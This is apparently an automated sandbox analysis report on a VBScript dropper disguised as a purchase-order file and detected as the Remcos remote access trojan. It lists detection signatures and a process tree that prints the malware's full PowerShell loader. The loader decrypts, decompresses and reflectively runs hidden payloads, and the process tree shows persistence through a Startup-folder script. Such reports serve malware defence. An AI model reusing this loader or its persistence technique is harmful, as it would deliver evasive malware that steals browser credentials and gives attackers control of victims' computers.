Windows
Analysis Report
PO#2195112.vbs
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Installs a global keyboard hook
Maps a DLL or memory area into another process
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
wscript.exe (PID: 712 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PO#21 95112.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) cmd.exe (PID: 3472 cmdline:
"C:\Window s\System32 \cmd.exe" /c C:\User s\user\App Data\Roami ng\dropped .bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 4828 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho cls;pow ershell -w hidden;fu nction dec rypt_funct ion($param _var){ $ae s_var=[Sys tem.Securi ty.Cryptog raphy.Aes] ::Create() ; $aes_var .Mode=[Sys tem.Securi ty.Cryptog raphy.Ciph erMode]::C BC; $aes_v ar.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $aes_var .Key=[Syst em.Convert ]::FromBas e64String( 'QipeuvuPH LjqQvGt9VT 5aLclluvrX EdJm/QUWEG zhvQ='); $ aes_var.IV =[System.C onvert]::F romBase64S tring('K8K FKefFC/hhz 69/oY9Vnw= ='); $decr yptor_var= $aes_var.C reateDecry ptor(); $r eturn_var= $decryptor _var.Trans formFinalB lock($para m_var, 0, $param_var .Length); $decryptor _var.Dispo se(); $aes _var.Dispo se(); $ret urn_var;}f unction de compress_f unction($p aram_var){ $cxhgH=Ne w-Object S ystem.IO.M emoryStrea m(,$param_ var); $XWy bH=New-Obj ect System .IO.Memory Stream; $O XCUo=New-O bject Syst em.IO.Comp ression.GZ ipStream($ cxhgH, [IO .Compressi on.Compres sionMode]: :Decompres s); $OXCUo .CopyTo($X WybH); $OX CUo.Dispos e(); $cxhg H.Dispose( ); $XWybH. Dispose(); $XWybH.To Array();}f unction ex ecute_func tion($para m_var,$par am2_var){ $sMWNP=[Sy stem.Refle ction.Asse mbly]::Loa d([byte[]] $param_var ); $QqvvE= $sMWNP.Ent ryPoint; $ QqvvE.Invo ke($null, $param2_va r);}$orZcJ = 'C:\Use rs\user\Ap pData\Roam ing\droppe d.bat';$ho st.UI.RawU I.WindowTi tle = $orZ cJ;$QZlmw= [System.IO .File]::Re adAllText( $orZcJ).Sp lit([Envir onment]::N ewLine);fo reach ($Hi Bel in $QZ lmw) { if ($HiBel.St artsWith(' gXFDerXiki mqJOlowotV ')) { $twZ ns=$HiBel. Substring( 20); break ; }}$paylo ads_var=[s tring[]]$t wZns.Split ('\');$pay load1_var= decompress _function (decrypt_f unction ([ Convert]:: FromBase64 String($pa yloads_var [0].Replac e('#', '/' ).Replace( '@', 'A')) ));$payloa d2_var=dec ompress_fu nction (de crypt_func tion ([Con vert]::Fro mBase64Str ing($paylo ads_var[1] .Replace(' #', '/').R eplace('@' , 'A')))); $payload3_ var=decomp ress_funct ion (decry pt_functio n ([Conver t]::FromBa se64String ($payloads _var[2].Re place('#', '/').Repl ace('@', ' A'))));exe cute_funct ion $paylo ad1_var $n ull;execut e_function $payload2 _var $null ;execute_f unction $p ayload3_va r (,[strin g[]] ('')) ; " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 1484 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 6836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 2432 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\o aanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 6484 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\o aanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 7072 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\o aanp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 6408 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\q ungqkxv" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 3984 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\q ungqkxv" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 3004 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe /s text "C:\U sers\user\ AppData\Lo cal\Temp\b xtzrdixjge " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
cmd.exe (PID: 2528 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\S C.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 6272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 4948 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho cls;pow ershell -w hidden;fu nction dec rypt_funct ion($param _var){ $ae s_var=[Sys tem.Securi ty.Cryptog raphy.Aes] ::Create() ; $aes_var .Mode=[Sys tem.Securi ty.Cryptog raphy.Ciph erMode]::C BC; $aes_v ar.Padding =[System.S ecurity.Cr yptography .PaddingMo de]::PKCS7 ; $aes_var .Key=[Syst em.Convert ]::FromBas e64String( 'QipeuvuPH LjqQvGt9VT 5aLclluvrX EdJm/QUWEG zhvQ='); $ aes_var.IV =[System.C onvert]::F romBase64S tring('K8K FKefFC/hhz 69/oY9Vnw= ='); $decr yptor_var= $aes_var.C reateDecry ptor(); $r eturn_var= $decryptor _var.Trans formFinalB lock($para m_var, 0, $param_var .Length); $decryptor _var.Dispo se(); $aes _var.Dispo se(); $ret urn_var;}f unction de compress_f unction($p aram_var){ $cxhgH=Ne w-Object S ystem.IO.M emoryStrea m(,$param_ var); $XWy bH=New-Obj ect System .IO.Memory Stream; $O XCUo=New-O bject Syst em.IO.Comp ression.GZ ipStream($ cxhgH, [IO .Compressi on.Compres sionMode]: :Decompres s); $OXCUo .CopyTo($X WybH); $OX CUo.Dispos e(); $cxhg H.Dispose( ); $XWybH. Dispose(); $XWybH.To Array();}f unction ex ecute_func tion($para m_var,$par am2_var){ $sMWNP=[Sy stem.Refle ction.Asse mbly]::Loa d([byte[]] $param_var ); $QqvvE= $sMWNP.Ent ryPoint; $ QqvvE.Invo ke($null, $param2_va r);}$orZcJ = 'C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ SC.cmd';$h ost.UI.Raw UI.WindowT itle = $or ZcJ;$QZlmw =[System.I O.File]::R eadAllText ($orZcJ).S plit([Envi ronment]:: NewLine);f oreach ($H iBel in $Q Zlmw) { if ($HiBel.S tartsWith( 'gXFDerXik imqJOlowot V')) { $tw Zns=$HiBel .Substring (20); brea k; }}$payl oads_var=[ string[]]$ twZns.Spli t('\');$pa yload1_var =decompres s_function (decrypt_ function ( [Convert]: :FromBase6 4String($p ayloads_va r[0].Repla ce('#', '/ ').Replace ('@', 'A') )));$paylo ad2_var=de compress_f unction (d ecrypt_fun ction ([Co nvert]::Fr omBase64St ring($payl oads_var[1 ].Replace( '#', '/'). Replace('@ ', 'A')))) ;$payload3 _var=decom press_func tion (decr ypt_functi on ([Conve rt]::FromB ase64Strin g($payload s_var[2].R eplace('#' , '/').Rep lace('@', 'A'))));ex ecute_func tion $payl oad1_var $ null;execu te_functio n $payload 2_var $nul l;execute_ function $ payload3_v ar (,[stri ng[]] ('') ); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) powershell.exe (PID: 6184 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) powershell.exe (PID: 5112 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |